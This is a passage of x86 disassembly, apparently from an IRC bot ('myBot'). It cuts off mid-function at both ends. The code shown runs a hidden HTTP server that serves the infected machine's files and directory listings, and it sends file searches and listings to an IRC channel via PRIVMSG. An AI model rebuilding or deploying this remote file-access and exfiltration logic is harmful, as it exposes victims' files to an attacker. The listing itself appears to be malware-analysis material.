cmp esi, [ebp+var_C]
jnz short loc_40FCDF
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call dword_4E318C ; accept
cmp eax, 0FFFFFFFFh
jz loc_40FF27
xor ecx, ecx
test ebx, ebx
jbe short loc_40FCB1
lea edx, [ebp+var_134]
loc_40FCA5: ; CODE XREF: sub_40FB50+15F�j
cmp [edx], eax
jz short loc_40FCB1
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_40FCA5
loc_40FCB1: ; CODE XREF: sub_40FB50+14D�j
; sub_40FB50+157�j
cmp ecx, ebx
jnz short loc_40FCCE
cmp ebx, 40h
jnb short loc_40FCCE
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_40FCCE: ; CODE XREF: sub_40FB50+163�j
; sub_40FB50+168�j
cmp eax, [ebp+var_8]
jbe loc_40FF27
mov [ebp+var_8], eax
jmp loc_40FF27
; ---------------------------------------------------------------------------
loc_40FCDF: ; CODE XREF: sub_40FB50+126�j
mov edi, 1000h
lea eax, [ebp+Str]
push edi ; Size
push 0 ; Val
push eax ; Dst
call _memset
push edi ; Size
lea eax, [ebp+Str1]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 18h
lea eax, [ebp+Str]
push 0
push edi
push eax
push esi
call dword_4E3110 ; recv
test eax, eax
jg short loc_40FD72
push esi
call dword_4E3190 ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_40FF27
lea eax, [ebp+var_134]
loc_40FD31: ; CODE XREF: sub_40FB50+1EB�j
cmp [eax], esi
jz short loc_40FD42
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40FD31
jmp loc_40FF27
; ---------------------------------------------------------------------------
loc_40FD42: ; CODE XREF: sub_40FB50+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40FD66
lea eax, [ebp+ecx*4+var_134]
loc_40FD50: ; CODE XREF: sub_40FB50+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40FD50
loc_40FD66: ; CODE XREF: sub_40FB50+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_40FF27
; ---------------------------------------------------------------------------
loc_40FD72: ; CODE XREF: sub_40FB50+1C8�j
xor esi, esi
push 104h ; Size
lea eax, [ebp+var_23C]
push esi ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Str]
mov [ebp+arg_0], esi
push eax ; Str
call _strlen
add esp, 10h
test eax, eax
jbe loc_40FF27
loc_40FDA0: ; CODE XREF: sub_40FB50+30F�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+Str]
cmp al, 0Ah
mov [ebp+esi+Str1], al
jnz loc_40FE4B
lea eax, [ebp+Str1]
push offset aGet_0 ; "GET "
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40FE1F
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 5
pop ecx
jbe short loc_40FE1F
push offset asc_44A7B8 ; " "
push offset asc_44A7BC ; " "
lea eax, [ebp+Str1]
push offset aGet_1 ; "GET "
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strtok
push eax ; Source
lea eax, [ebp+var_23C]
push eax ; Dest
call _strcpy
add esp, 10h
jmp short loc_40FE36
; ---------------------------------------------------------------------------
loc_40FE1F: ; CODE XREF: sub_40FB50+27E�j
; sub_40FB50+290�j
lea eax, [ebp+Str1]
push offset asc_44A7C8 ; "\r\n"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40FE6A
loc_40FE36: ; CODE XREF: sub_40FB50+2CD�j
push edi ; Size
lea eax, [ebp+Str1]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_40FE4B: ; CODE XREF: sub_40FB50+263�j
inc [ebp+arg_0]
lea eax, [ebp+Str]
push eax ; Str
inc esi
call _strlen
cmp [ebp+arg_0], eax
pop ecx
jb loc_40FDA0
jmp loc_40FF27
; ---------------------------------------------------------------------------
loc_40FE6A: ; CODE XREF: sub_40FB50+2E4�j
xor ecx, ecx
test ebx, ebx
jbe short loc_40FEB4
lea eax, [ebp+var_134]
loc_40FE76: ; CODE XREF: sub_40FB50+333�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_40FE87
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40FE76
jmp short loc_40FEB7
; ---------------------------------------------------------------------------
loc_40FE87: ; CODE XREF: sub_40FB50+32B�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40FEAB
lea eax, [ebp+ecx*4+var_134]
loc_40FE95: ; CODE XREF: sub_40FB50+359�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40FE95
loc_40FEAB: ; CODE XREF: sub_40FB50+33C�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_40FEB7
; ---------------------------------------------------------------------------
loc_40FEB4: ; CODE XREF: sub_40FB50+31E�j
mov esi, [ebp+var_4]
loc_40FEB7: ; CODE XREF: sub_40FB50+335�j
; sub_40FB50+362�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_40FF20
lea eax, [ebp+var_360]
push eax ; Str
call _strlen
mov edi, eax
lea eax, [ebp+var_23C]
push eax ; Str
call _strlen
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_40FF20
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call dword_4E3194 ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_410134
add esp, 14h
jmp short loc_40FF27
; ---------------------------------------------------------------------------
loc_40FF20: ; CODE XREF: sub_40FB50+36F�j
; sub_40FB50+395�j
push esi
call dword_4E3190 ; closesocket
loc_40FF27: ; CODE XREF: sub_40FB50+11D�j
; sub_40FB50+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_40FC5D
jmp loc_40FC27
; ---------------------------------------------------------------------------
loc_40FF3C: ; CODE XREF: sub_40FB50+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_40FF41: ; CODE XREF: sub_40FB50+6A�j
; sub_40FB50+92�j ...
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44A7CC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_40FF87
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_250] ; int
push eax ; int
lea eax, [ebp+var_5E8]
push eax ; Str
push [ebp+var_5EC] ; int
call sub_409D34
add esp, 14h
loc_40FF87: ; CODE XREF: sub_40FB50+412�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
push edi
call dword_4E3190 ; closesocket
push [ebp+var_254]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
sub_40FB50 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FFB1 proc near ; DATA XREF: sub_410134+24D�o
Str = byte ptr -1654h
Source = byte ptr -654h
Dest = byte ptr -550h
var_44C = dword ptr -44Ch
Format = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call __alloca_probe
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push eax ; Format
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
xor edi, edi
pop ecx
cmp [ebp+var_A4], edi
pop ecx
jz short loc_410017
push offset aTextHtml ; "text/html"
jmp short loc_41001C
; ---------------------------------------------------------------------------
loc_410017: ; CODE XREF: sub_40FFB1+5D�j
push offset aApplicationOct ; "application/octet-stream"
loc_41001C: ; CODE XREF: sub_40FFB1+64�j
lea eax, [ebp+var_9C]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_4F53D8 ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_4F53D4 ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_410095
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+Str]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 24h
jmp short loc_4100B6
; ---------------------------------------------------------------------------
loc_410095: ; CODE XREF: sub_40FFB1+C5�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+Str]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 28h
loc_4100B6: ; CODE XREF: sub_40FFB1+E2�j
lea eax, [ebp+Str]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+var_44C]
call dword_4E3148 ; send
cmp [ebp+var_A4], edi
jnz short loc_4100F6
lea eax, [ebp+Dest]
push eax
push [ebp+var_44C]
call sub_410A71
pop ecx
pop ecx
jmp short loc_410113
; ---------------------------------------------------------------------------
loc_4100F6: ; CODE XREF: sub_40FFB1+12D�j
lea eax, [ebp+Source]
push eax ; Source
push edi ; int
push [ebp+var_44C] ; int
lea eax, [ebp+Dest]
push eax ; Str
call sub_4103EB
add esp, 10h
loc_410113: ; CODE XREF: sub_40FFB1+143�j
push [ebp+var_44C]
call dword_4E3190 ; closesocket
push [ebp+var_B4]
call sub_40BA72
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_40FFB1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410134 proc near ; CODE XREF: sub_40FB50+3C6�p
Source = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
Str = byte ptr -314h
var_211 = byte ptr -211h
Dst = byte ptr -210h
Dest = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
mov [ebp+var_4], edi
call _memset
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_41016A
push eax
push offset aS_25 ; "\\%s"
jmp short loc_410173
; ---------------------------------------------------------------------------
loc_41016A: ; CODE XREF: sub_410134+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_26 ; "%s"
loc_410173: ; CODE XREF: sub_410134+34�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
xor esi, esi
xor ebx, ebx
push eax ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_41020E
mov [ebp+arg_8], 2
loc_41019E: ; CODE XREF: sub_410134+D8�j
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_4101DE
cmp [ebp+esi+Dest], 25h
jnz short loc_4101DE
cmp [ebp+esi+var_10B], 32h
jnz short loc_4101DE
cmp [ebp+esi+var_10A], 30h
jnz short loc_4101DE
inc esi
mov [ebp+ebx+Dst], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_4101F8
; ---------------------------------------------------------------------------
loc_4101DE: ; CODE XREF: sub_410134+7A�j
; sub_410134+84�j ...
mov al, [ebp+esi+Dest]
cmp al, 2Fh
jnz short loc_4101EE
push 5Ch
pop eax
jmp short loc_4101F1
; ---------------------------------------------------------------------------
loc_4101EE: ; CODE XREF: sub_410134+B3�j
movsx eax, al
loc_4101F1: ; CODE XREF: sub_410134+B8�j
mov [ebp+ebx+Dst], al
loc_4101F8: ; CODE XREF: sub_410134+A8�j
lea eax, [ebp+Dest]
inc esi
inc [ebp+arg_8]
push eax ; Str
inc ebx
call _strlen
cmp esi, eax
pop ecx
jb short loc_41019E
loc_41020E: ; CODE XREF: sub_410134+61�j
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Str]
push [ebp+arg_4]
push offset aSS_4 ; "%s%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push offset asc_44AA18 ; "\n"
push eax ; Str
call _strtok
add esp, 18h
lea eax, [ebp+Str]
push eax
call ds:dword_4F536C ; GetFileAttributesA
push 1
cmp eax, 10h
pop esi
jz short loc_41025F
cmp eax, 0FFFFFFFFh
jnz short loc_410262
push [ebp+arg_0]
jmp loc_4102E2
; ---------------------------------------------------------------------------
loc_41025F: ; CODE XREF: sub_410134+11C�j
mov [ebp+var_4], esi
loc_410262: ; CODE XREF: sub_410134+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_41026F
mov [ebp+var_4], esi
loc_41026F: ; CODE XREF: sub_410134+136�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_4102ED
cmp [ebp+arg_C], edi
jz short loc_4102E1
lea eax, [ebp+Str]
push offset asc_44AA1C ; "*"
push eax ; Dest
call _strcat
pop ecx
lea eax, [ebp+Str]
pop ecx
push eax ; Format
lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Str
call sub_410B2E
add esp, 0Ch
lea eax, [ebp+Dst]
push eax ; Format
lea eax, [ebp+var_53C]
push eax ; Dest
call _sprintf
or [ebp+var_330], 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+var_31C], esi
jmp short loc_41033C
; ---------------------------------------------------------------------------
loc_4102E1: ; CODE XREF: sub_410134+152�j
push ebx
loc_4102E2: ; CODE XREF: sub_410134+126�j
call dword_4E3190 ; closesocket
jmp loc_4103E4
; ---------------------------------------------------------------------------
loc_4102ED: ; CODE XREF: sub_410134+14D�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+Str]
push 80000000h
push eax
call ds:dword_4F53C0 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41033C
lea eax, [ebp+Str]
push eax ; Format
lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:dword_4F53DC ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_4F533C ; CloseHandle
loc_41033C: ; CODE XREF: sub_410134+1AB�j
; sub_410134+1D6�j
mov esi, [ebp+arg_10]
lea eax, [ebp+Source]
push esi
push offset asc_44AA20 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Source]
push 3 ; int
push eax ; Source
call sub_40B756
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_45601C[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_40FFB1
push edi
push edi
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_45602C[ecx], eax
jz short loc_4103B6
loc_4103A4: ; CODE XREF: sub_410134+280�j
cmp [ebp+var_318], edi
jnz short loc_4103E4
push 5
call ds:dword_4F534C ; Sleep
jmp short loc_4103A4
; ---------------------------------------------------------------------------
loc_4103B6: ; CODE XREF: sub_410134+26E�j
push ebx
call dword_4E3190 ; closesocket
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_44AA54 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_415C3F
add esp, 10h
loc_4103E4: ; CODE XREF: sub_410134+1B4�j
; sub_410134+276�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_410134 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4103EB(char *Str,int,int,char *Source)
sub_4103EB proc near ; CODE XREF: sub_401CC7+7823�p
; sub_40FFB1+15A�p
Dst = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
Str1 = byte ptr -35Ch
var_248 = byte ptr -248h
Dest = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call _memset
mov edi, [ebp+Str]
push offset asc_44AA8C ; "\n"
push edi ; Str
call _strtok
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_41044A
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp loc_410549
; ---------------------------------------------------------------------------
loc_41044A: ; CODE XREF: sub_4103EB+3A�j
cmp [ebp+Source], ebx
push edi ; Str
jz loc_41052F
call _strlen
pop ecx
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
push edi ; Str
call _strlen
pop ecx
mov byte ptr [eax+edi], 2Ah
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_410549
; ---------------------------------------------------------------------------
loc_41052F: ; CODE XREF: sub_4103EB+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_410549: ; CODE XREF: sub_4103EB+5A�j
; sub_4103EB+142�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
cmp [ebp+Source], ebx
jz short loc_4105E4
push [ebp+Source] ; Str
call _strlen
cmp eax, 2
pop ecx
jbe short loc_4105E4
push [ebp+Source] ; Str
call _strlen
sub eax, 3
pop ecx
jz short loc_410595
loc_410589: ; CODE XREF: sub_4103EB+1A8�j
mov ecx, [ebp+Source]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_410595
dec eax
jnz short loc_410589
loc_410595: ; CODE XREF: sub_4103EB+19C�j
; sub_4103EB+1A5�j
inc eax
push eax ; Count
lea eax, [ebp+Dst]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
loc_4105E4: ; CODE XREF: sub_4103EB+180�j
; sub_4103EB+18E�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:dword_4F53F0 ; FindFirstFileA
lea ecx, [ebp+var_388]
mov [ebp+Str], eax
push ecx
push eax
call ds:dword_4F53EC ; FindNextFileA
test eax, eax
jz loc_4109D4
mov edi, 1FFh
loc_410610: ; CODE XREF: sub_4103EB+5E3�j
cmp [ebp+var_388], ebx
jz loc_4109BC
lea eax, [ebp+Str1]
push offset a__ ; ".."
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4109BC
lea eax, [ebp+Str1]
push offset a__2 ; "."
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4109BC
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_4F53E8 ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_4F53E4 ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm_0 ; "PM"
cmp ax, 0Ch
ja short loc_410685
mov ecx, offset aAm ; "AM"
loc_410685: ; CODE XREF: sub_4103EB+293�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_410691
sub eax, 0Ch
loc_410691: ; CODE XREF: sub_4103EB+2A1�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+Dest]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax ; Dest
call _sprintf
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_410834
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_410705
lea eax, [ebp+Str1]
push eax
push offset aS_27 ; "<%s>"
lea eax, [ebp+var_490]
push 106h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_490]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
jmp loc_41097D
; ---------------------------------------------------------------------------
loc_410705: ; CODE XREF: sub_4103EB+2E0�j
cmp [ebp+Source], ebx
jz loc_4107EF
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_248]
push [ebp+Source]
push offset aSS_5 ; "%s%s/"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Eh
pop ecx
lea eax, [ebp+Str1]
push eax
jbe short loc_4107A5
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4107AA
; ---------------------------------------------------------------------------
loc_4107A5: ; CODE XREF: sub_4103EB+3B1�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4107AA: ; CODE XREF: sub_4103EB+3B8�j
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
lea eax, [ebp+Dest]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_41097E
; ---------------------------------------------------------------------------
loc_4107EF: ; CODE XREF: sub_4103EB+31D�j
lea eax, [ebp+Str1]
push eax
push offset aS_28 ; "<%s>"
lea eax, [ebp+var_490]
push 106h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp loc_41098D
; ---------------------------------------------------------------------------
loc_410834: ; CODE XREF: sub_4103EB+2D4�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_410873
push ebx
push [ebp+var_368]
call sub_41748B
pop ecx
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
push esi ; Count
loc_41085F: ; CODE XREF: sub_4103EB+577�j
lea eax, [ebp+var_248]
push eax ; Dest
call __snprintf
add esp, 1Ch
jmp loc_41098D
; ---------------------------------------------------------------------------
loc_410873: ; CODE XREF: sub_4103EB+44F�j
cmp [ebp+Source], ebx
jz loc_410967
push 0E6h
push offset aTrTdWidthDAH_0 ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_248]
push [ebp+Source]
push offset aSS_6 ; "%s%s"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Fh
pop ecx
lea eax, [ebp+Str1]
push eax
jbe short loc_410913
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_410918
; ---------------------------------------------------------------------------
loc_410913: ; CODE XREF: sub_4103EB+51F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_410918: ; CODE XREF: sub_4103EB+526�j
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+Dest]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_41085F
; ---------------------------------------------------------------------------
loc_410967: ; CODE XREF: sub_4103EB+48B�j
push [ebp+var_368]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
loc_41097D: ; CODE XREF: sub_4103EB+315�j
push esi ; Count
loc_41097E: ; CODE XREF: sub_4103EB+3FF�j
lea eax, [ebp+var_248]
push eax ; Dest
call __snprintf
add esp, 18h
loc_41098D: ; CODE XREF: sub_4103EB+444�j
; sub_4103EB+483�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
